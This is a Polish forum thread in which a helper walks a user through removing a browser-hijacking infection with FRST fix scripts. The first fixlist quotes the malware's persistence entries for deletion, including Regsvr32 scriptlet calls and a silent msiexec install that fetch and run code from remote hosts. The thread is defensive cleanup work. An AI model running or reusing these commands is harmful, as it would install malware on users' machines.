Elektroda.pl
Elektroda.pl
X
Proszę, dodaj wyjątek www.elektroda.pl do Adblock.
Dzięki temu, że oglądasz reklamy, wspierasz portal i użytkowników.

Zainfekowany laptop-luckystarting

bedrejczuk 21 Kwi 2017 11:59 966 4
  • #1 21 Kwi 2017 11:59
    bedrejczuk
    Poziom 4  

    Dzień dobry,
    proszę o pomoc w usunięciu wirusa z laptopa, dochodzi do tego, że otwiera strony jakie chce. W związku z tym przeskanowałam komputer Dr Web Scanner, potem Malvare i zrobiłam logi z frst. Proszę o pomoc w analizie logów i usunięciu wirusa. Wszystkie pliki i raporty spakowane w rar.

    0 4
  • #2 21 Kwi 2017 12:07
    Kolobos
    Spec od komputerów

    Zgraj zakladki z Firefox, skrypt usunie katalog profilu (ten utworzony przez infekcje).

    Odinstaluj: McAfee Security Scan Plus

    Obok frst.exe utworz plik Fixlist.txt z zawartoscia:
    CloseProcesses:
    HKU\S-1-5-21-3786669421-767851228-3943137293-1000\...\ChromeHTML: -> C:\Program Files (x86)\Eastness\Application\chrome.exe (Google Inc.) <==== UWAGA
    Task: {6D31CE49-CBC6-4F45-BA0F-FD366A07AE27} - System32\Tasks\Windows-WoShiBeiYongDe => Regsvr32.exe /s /i:hxxp://u76wtn6.x.incapdns.net/?data=zDlkMj85RkY2MjMxMdE8MdZYMWI2OTwyFTRQMjkdFdM3NdJYMc== scrobj.dll
    Task: {A1667C12-3949-44F6-BE90-8160CF407CE1} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lbyhbyc.com/?data=zDlkMj85RkY2MjMxMdE8MdZYMWI2OTwyFTRQMjkdFdM3NdJYMc== scrobj.dll
    Task: {EC400738-2B64-4613-866A-8D1741C4EA12} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-02-06] ()
    Shortcut: C:\Users\Dell\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Eastness\Application\chrome.exe (Google Inc.)
    Shortcut: C:\Users\Dell\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk -> C:\Program Files (x86)\Eastness\Application\chrome.exe (Google Inc.)
    Shortcut: C:\Users\Dell\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Google Chrome.lnk -> C:\Program Files (x86)\Eastness\Application\chrome.exe (Google Inc.)
    Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Eastness\Application\chrome.exe (Google Inc.)
    Shortcut: C:\Users\Public\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Eastness\Application\chrome.exe (Google Inc.)
    (kitty.exe) C:\Users\Dell\AppData\Local\Kitty\cat.exe
    (© 2015 Microsoft Corporation) C:\Users\Dell\AppData\Local\Microsoft\BingSvc\BingSvc.exe
    (McAfee, Inc.) C:\Program Files\McAfee Security Scan\3.11.523\SSScheduler.exe
    HKU\S-1-5-21-3786669421-767851228-3943137293-1000\...\Run: [BingSvc] => C:\Users\Dell\AppData\Local\Microsoft\BingSvc\BingSvc.exe [144008 2015-11-13] (© 2015 Microsoft Corporation)
    HKU\S-1-5-21-3786669421-767851228-3943137293-1000\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj85RkY2MjMxMdE8MdZYMWI2OTwyFTRQMjkdFdM3NdJYMc== /q
    HKU\S-1-5-21-3786669421-767851228-3943137293-1000\...\MountPoints2: E - E:\AutoRun.exe
    HKU\S-1-5-21-3786669421-767851228-3943137293-1000\...\MountPoints2: F - F:\AutoRun.exe
    HKU\S-1-5-21-3786669421-767851228-3943137293-1000\...\MountPoints2: {3df96bca-effe-11e5-9613-8c705a0dc170} - E:\AutoRun.exe
    HKU\S-1-5-21-3786669421-767851228-3943137293-1000\...\MountPoints2: {5d960f97-7b00-11e5-be33-8c705a0dc170} - F:\AutoRun.exe




    HKU\S-1-5-21-3786669421-767851228-3943137293-1000\...\MountPoints2: {5d960fa4-7b00-11e5-be33-8c705a0dc170} - E:\AutoRun.exe
    HKU\S-1-5-21-3786669421-767851228-3943137293-1000\...\MountPoints2: {69808fb6-d6f6-11e5-b9b2-001e101fe5e1} - E:\AutoRun.exe
    HKU\S-1-5-21-3786669421-767851228-3943137293-1000\...\MountPoints2: {7f5edf78-5928-11e5-83c3-001e101f8ed0} - E:\AutoRun.exe
    HKU\S-1-5-21-3786669421-767851228-3943137293-1000\...\MountPoints2: {80b3ffed-7d4a-11e5-95a4-001e101f8aaa} - E:\AutoRun.exe
    HKU\S-1-5-21-3786669421-767851228-3943137293-1000\...\MountPoints2: {8a016b49-ef7c-11e5-8fef-8c705a0dc170} - E:\AutoRun.exe
    HKU\S-1-5-21-3786669421-767851228-3943137293-1000\...\MountPoints2: {8a016b55-ef7c-11e5-8fef-8c705a0dc170} - E:\AutoRun.exe
    HKU\S-1-5-21-3786669421-767851228-3943137293-1000\...\MountPoints2: {96fe5e6b-8587-11e5-a5cc-8c705a0dc170} - E:\AutoRun.exe
    HKU\S-1-5-21-3786669421-767851228-3943137293-1000\...\MountPoints2: {981fabab-d00e-11e5-9221-001e101f79c9} - E:\AutoRun.exe
    HKU\S-1-5-21-3786669421-767851228-3943137293-1000\...\MountPoints2: {981fabb8-d00e-11e5-9221-001e101f79c9} - E:\AutoRun.exe
    HKU\S-1-5-21-3786669421-767851228-3943137293-1000\...\MountPoints2: {981fabc2-d00e-11e5-9221-001e101f79c9} - E:\AutoRun.exe
    HKU\S-1-5-21-3786669421-767851228-3943137293-1000\...\MountPoints2: {b3449d4b-5942-11e5-8ff1-001e101f9843} - E:\AutoRun.exe
    HKU\S-1-5-21-3786669421-767851228-3943137293-1000\...\MountPoints2: {c0a24e8f-5892-11e5-911f-8c705a0dc170} - E:\AutoRun.exe
    HKU\S-1-5-21-3786669421-767851228-3943137293-1000\...\MountPoints2: {c0a24ea2-5892-11e5-911f-8c705a0dc170} - E:\AutoRun.exe
    HKU\S-1-5-21-3786669421-767851228-3943137293-1000\...\MountPoints2: {c21afc0c-f336-11e5-92f8-8c705a0dc170} - F:\AutoRun.exe
    HKU\S-1-5-21-3786669421-767851228-3943137293-1000\...\MountPoints2: {c32fcf67-7af3-11e5-8eea-001e101f82a0} - E:\AutoRun.exe
    HKU\S-1-5-21-3786669421-767851228-3943137293-1000\...\MountPoints2: {d174648c-d3dc-11e5-b931-001e101f4da1} - E:\AutoRun.exe
    HKU\S-1-5-21-3786669421-767851228-3943137293-1000\...\MountPoints2: {d35bbbd1-4e85-11e6-8be8-001e101faa49} - E:\Lenovo_Suite.exe
    HKU\S-1-5-21-3786669421-767851228-3943137293-1000\...\MountPoints2: {f5f001a0-56e1-11e6-8673-d4bed96deec3} - E:\Startme.exe
    IFEO\DisplaySwitch.exe: [Debugger]
    IFEO\taskmgr.exe: [Debugger]
    Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\McAfee Security Scan Plus.lnk [2017-04-08]
    ShortcutTarget: McAfee Security Scan Plus.lnk -> C:\Program Files\McAfee Security Scan\3.11.523\SSScheduler.exe (McAfee, Inc.)
    FF ProfilePath: C:\Users\Dell\AppData\Roaming\Firefox\Firefox\Profiles\43f75wsa.default [2017-04-18]
    FF Extension: (HSearch) - C:\Users\Dell\AppData\Roaming\Firefox\Firefox\Profiles\43f75wsa.default\Extensions\@E97YHOMI-FU8L-IM23-VUT9-RVDZT7M8XL8H.xpi [2017-04-17] [Brak podpisu cyfrowego]
    FF Extension: (FF Adr) - C:\Users\Dell\AppData\Roaming\Firefox\Firefox\Profiles\43f75wsa.default\Extensions\@H99KV4DO-UCCF-9PFO-9ZLK-8RRP4FVOKD9O.xpi [2017-04-17] [Brak podpisu cyfrowego]
    FF SearchPlugin: C:\Users\Dell\AppData\Roaming\Firefox\Firefox\Profiles\43f75wsa.default\searchplugins\startsearch.xml [2017-04-17]
    R2 Kitty; C:\Users\Dell\AppData\Local\Kitty\cat.exe [357376 2017-04-14] (kitty.exe) [Brak podpisu cyfrowego]
    S3 McComponentHostService; C:\Program Files\McAfee Security Scan\3.11.523\McCHSvc.exe [404376 2017-03-20] (McAfee, Inc.)
    R2 WinSAPSvc; C:\Users\Dell\AppData\Roaming\WinSAPSvc\WinSAP.dll [494592 2017-04-20] (winsap) [Brak podpisu cyfrowego]
    S3 ewusbmbb; system32\DRIVERS\ewusbwwan.sys [X]
    S3 ew_hwusbdev; system32\DRIVERS\ew_hwusbdev.sys [X]
    S3 huawei_enumerator; system32\DRIVERS\ew_jubusenum.sys [X]
    S3 hwdatacard; system32\DRIVERS\ewusbmdm.sys [X]
    2017-04-21 08:49 - 2017-04-21 08:49 - 00000000 _____ C:\Windows\SysWOW64\22
    2017-04-21 08:49 - 2017-04-21 08:49 - 00000000 _____ C:\Windows\SysWOW64\11
    2017-04-17 20:41 - 2017-04-21 10:17 - 00000000 _____ C:\Users\Public\Documents\report.dat
    2017-04-17 20:41 - 2017-04-21 09:07 - 00000023 _____ C:\Users\Public\Documents\temp.dat
    2017-04-17 20:41 - 2017-04-17 20:41 - 00001890 _____ C:\Users\Public\Desktop\Mozilla Firefox.lnk
    2017-04-17 20:41 - 2017-04-17 20:41 - 00000000 ____D C:\Users\Dell\AppData\Roaming\Firefox
    2017-04-17 20:41 - 2017-04-17 20:41 - 00000000 ____D C:\Users\Dell\AppData\Local\Kitty
    2017-04-17 20:41 - 2017-04-17 20:41 - 00000000 ____D C:\Users\Dell\AppData\Local\Firefox
    2017-04-17 20:41 - 2017-04-17 20:41 - 00000000 ____D C:\Users\Dell\AppData\Local\Eastness
    2017-04-17 20:41 - 2017-04-17 20:41 - 00000000 ____D C:\ProgramData\Software
    2017-04-17 20:41 - 2017-04-17 20:41 - 00000000 ____D C:\Program Files (x86)\Firefox
    2017-04-17 20:41 - 2017-04-17 20:41 - 00000000 ____D C:\Program Files (x86)\Eastness
    2017-04-17 20:40 - 2017-04-20 11:06 - 00003552 _____ C:\Windows\System32\Tasks\Milimili
    2017-04-17 20:40 - 2017-04-20 11:06 - 00000000 ____D C:\Users\Dell\AppData\Roaming\WinSAPSvc
    2017-04-17 20:40 - 2017-04-17 20:40 - 00000000 ____D C:\Users\Dell\AppData\Local\SNARE
    2017-04-17 20:40 - 2017-04-17 20:40 - 00000000 ____D C:\Program Files (x86)\MIO
    2017-04-13 20:07 - 2017-04-13 20:08 - 00003574 _____ C:\Windows\System32\Tasks\Windows-WoShiBeiYongDe
    2017-04-13 20:07 - 2017-04-13 20:07 - 00000000 ____D C:\Users\Dell\AppData\Roaming\SSMgre
    2017-04-10 12:19 - 2017-04-13 20:08 - 00003564 _____ C:\Windows\System32\Tasks\PowerWord-SCT-JT
    2017-04-08 18:01 - 2015-11-21 19:02 - 00000000 ____D C:\Program Files\McAfee Security Scan
    2017-04-08 18:01 - 2015-09-11 18:01 - 00001964 _____ C:\Users\Public\Desktop\McAfee Security Scan Plus.lnk
    2016-03-25 10:56 - 2016-03-25 10:56 - 6493696 _____ () C:\Users\Dell\AppData\Roaming\agent.dat
    2016-03-25 10:53 - 2016-03-25 10:53 - 0127488 _____ () C:\Users\Dell\AppData\Roaming\Installer.dat
    2016-03-25 10:56 - 2016-03-25 10:56 - 0018432 _____ () C:\Users\Dell\AppData\Roaming\Main.dat
    EmptyTemp:

    W FRST wybierz Napraw.

    Po wykonaniu zamiesc nowe logi z FRST, ze skanowania.

    0
  • #3 21 Kwi 2017 13:05
    bedrejczuk
    Poziom 4  

    Zaimportowałam zakładki z chrome, na firefox była nieznana mi strona stratowa i zero moich zakładek. Odinstałowałam Avasta. Po zakończeniu całego procesu, i ponownym uruchomieniu komputera, odinstalowało mi przeglądarkę chrome. Przesyłam nowe logi.

    0
  • #4 21 Kwi 2017 13:46
    Kolobos
    Spec od komputerów

    To byl Chrome "zainstalowany" przez infekcje, dlatego musial zniknac.

    Nowy Fixlist.txt dla FRST:
    S2 SNARE; C:\Users\Dell\AppData\Local\SNARE\Snarer.dll [X]

    Po wykonaniu usun katalog C:\FRST i to wszystko.

    0
  • #5 21 Kwi 2017 16:23
    bedrejczuk
    Poziom 4  

    Dziękuję serdecznie. Wszystko działa!

    0